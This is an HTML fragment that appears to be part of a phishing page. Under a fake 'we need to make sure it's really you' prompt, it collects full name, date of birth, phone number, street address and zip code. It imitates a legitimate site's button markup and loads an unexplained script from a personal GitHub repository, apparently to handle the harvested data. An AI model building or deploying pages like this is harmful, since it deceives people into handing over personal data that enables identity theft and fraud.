    <p style="color: #8f0c02;font-weight: 500;">We need to make sure it's really you, please enter the following
        Information to continue.</p>


    <div class="container" style="padding: 20px 0">
        <div class="row">
            <div class="col">
                <div class="form-floating mb-3">
                    <input type="text" class="form-control" id="full_name" placeholder="John McDonald">
                    <label for="full_name">Full Name</label>
                </div>
            </div>
        </div>

        <div class="row">
            <div class="here_me col-12 col-sm-6">
                <div class="form-floating mb-3">
                    <input type="text" class="form-control" id="dob" placeholder="02/12/1987">
                    <label for="dob">Date of Birth</label>
                </div>
            </div>
            <div class="col-12 col-sm-6">
                <div class="form-floating mb-3">
                    <input type="text" class="form-control" id="phone_number" placeholder="4328947653">
                    <label for="phone_number">Phone Number</label>
                </div>
            </div>
        </div>

        <div class="row">
            <div class="col-12 col-sm-8">
                <div class="form-floating mb-3">
                    <input type="text" class="form-control" id="address" placeholder="Street Address">
                    <label for="address">Street Address</label>
                </div>
            </div>
            <div class="col-12 col-sm-4">
                <div class="form-floating mb-3">
                    <input type="text" class="form-control" id="zipcode" placeholder="12345">
                    <label for="zipcode">Zip Code</label>
                </div>
            </div>
        </div>

        <br/>
        <div id="ember_401" class="cta submit-button-component submit-button-with-spinner ember-view">
            <button type="submit" id="submit_button_2" aria-label="Continue"
                    class="button theme-button button--round theme-button" data-ember-action=""
                    data-ember-action-402="402" disabled>
                <span>Continue</span>
                <i style="font-size: 30px; display: none" class="fas fa-circle-notch fa-spin"></i>
            </button>
        </div>
    </div>

</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"
        integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"
        integrity="sha256-Kg2zTcFO9LXOc7IwcBx1YeUBJmekycsnTsq2RuFHSZU=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js"
        integrity="sha384-QJHtvGhmr9XOIpI6YVutG+2QOK9T+ZnN4kzFN1RtK3zEFEIsxhlmWl5/YESvpZ13"
        crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
        crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/static/jx.js"></script>
</body>
</html>